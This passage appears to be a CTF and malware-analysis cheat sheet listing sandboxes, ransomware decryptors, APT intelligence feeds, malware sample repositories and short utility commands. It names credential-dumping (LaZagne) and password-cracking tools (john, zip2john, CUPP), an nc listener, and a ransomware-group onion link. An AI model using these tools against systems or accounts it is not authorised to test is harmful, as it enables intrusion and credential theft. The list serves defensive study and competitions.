* This tool allows you to intercept and redirect all or specific network traffic while simulating legitimate network services: https://github.com/mandiant/flare-fakenet-ng

### Free AVs and Sandboxes

* ClamAV: https://www.clamav.net/downloads#otherversions

* MAC AV: https://www.pcrisk.es/mejores-programas-antivirus/8365-combo-cleaner-antivirus-and-system-optimizer-mac

* Sandbox: https://github.com/CERT-Polska/drakvuf-sandbox

* DragonFly: https://dragonfly.certego.net/register

* Offline Sandbox: https://sandboxie-plus.com/downloads/

### Ransomware

* Ransomware decryption tools: http://files-download.avg.com/util/avgrem/avg_decryptor_Legion.exe, https://success.trendmicro.com/solution/1114221-downloading-and-using-the-trend-micro-ransomware-file-decryptor, https://www.nomoreransom.org/es/decryption-tools.htmlm, https://www.avast.com/es-es/ransomware-decryption-tools , https://noransom.kaspersky.com/ , https://www.mcafee.com/enterprise/es-es/downloads/free-tools/ransomware-decryption.html, https://www.mcafee.com/enterprise/en-us/downloads/free-tools.html, https://www.emsisoft.com/ransomware-decryption-tools/, https://decoded.avast.io/threatresearch/decrypted-bianlian-ransomware/.

* General Overview: https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml#

* Ransomware groups: http://edteebo2w2bvwewbjb5wgwxksuwqutbg3lk34ln7jpf3obhy4cvkbuqd.onion/

### APTs

* Intelligence: https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/pubhtml# && https://github.com/StrangerealIntel/EternalLiberty/blob/main/EternalLiberty.csv && https://xorl.wordpress.com/

Are you an APT target? -> https://lab52.io/

* APT Simulator: https://github.com/NextronSystems/APTSimulator

### Blogs and Information

* Macros: https://blog.didierstevens.com/2021/01/19/video-maldoc-analysis-with-cyberchef/ && https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/

* Malware examples/binaries: https://bazaar.abuse.ch/, https://github.com/ytisf/theZoo & https://malshare.com/

## Utility

* To bypass some filtered ports: nmap -sSV ...

* zip2john backup.zip secret.hash

* john --show secret.hash

* Hexeditor

* nc -nlvp URL port

* Grep

* rgrep (Recursive grep)

* awk

* perl

* tail / head

* curl -Llv domain | curl -b "protected=d41d8cd98f00b204e9800998ecf8427e"(cookie) "domain"

* Identify -verbose

* Hash-identifier

* cat 'file' | md5sum, sha1sum,sha256sum...

* echo "string" | base64 -d

* Strings

* File

* Cewl. Cheat sheet: https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-5-creating-custom-wordlist-with-cewl-0158855/

* Password Recovery Online : https://www.lostmypass.com/try/

* Passwords stored in a computer: https://github.com/AlessandroZ/LaZagne

* Disk Image: https://www.datanumen.com/disk-image-download-thanks/

* crackzip: https://github.com/Xpykerz/CrackZip

* zip2john: https://github.com/openwall/john/blob/bleeding-jumbo/src/zip2john.c

* Common User Passwords Profiler: https://github.com/Mebus/cupp y https://github.com/r3nt0n/bopscrk.

* Dig: https://cheatography.com/tme520/cheat-sheets/dig/

* wget -nd -r -P /save/location -A jpeg,jpg,bmp,gif,png http://www.somedomain.com

* Recursive file download bypassing robots.txt: wget -e robots=off -drc -l5 domain

* [ICMP exfiltration] tshark -r 1pcap_test_1c.pcapng -Y "icmp" -Tjson | grep data.data | awk {'print $2'} | cut -c 2-3 | uniq | xxd -r -p

* Oneliners: https://linuxcommandlibrary.com/basic/oneliners.html

* Google information:
![image](https://user-images.githubusercontent.com/74070814/147261470-9a738efb-69de-4b89-98aa-be27a9f83d78.png)

## Wikis

https://github.com/JohnHammond/ctf-katana

https://github.com/OpenToAllCTF/Tips

Reversing tutorial: https://github.com/mytechnotalent/Reverse-Engineering-Tutorial

## Write-Ups

https://ctftime.org/writeups

https://apsdehal.in/awesome-ctf/

https://jorgectf.gitlab.io/

https://github.com/0e85dc6eaf/CTF-Writeups

https://github.com/RazviOverflow/ctfs

https://github.com/DEKRA-CTF/CTFs/tree/main/2020

https://medium.com/bugbountywriteup/tryhackme-reversing-elf-writeup-6fd006704148

https://github.com/W3rni0/ctf_writeups_archive/tree/master/castorsCTF_2020

## Other tools

https://github.com/zardus/ctf-tools

https://github.com/apsdehal/awesome-ctf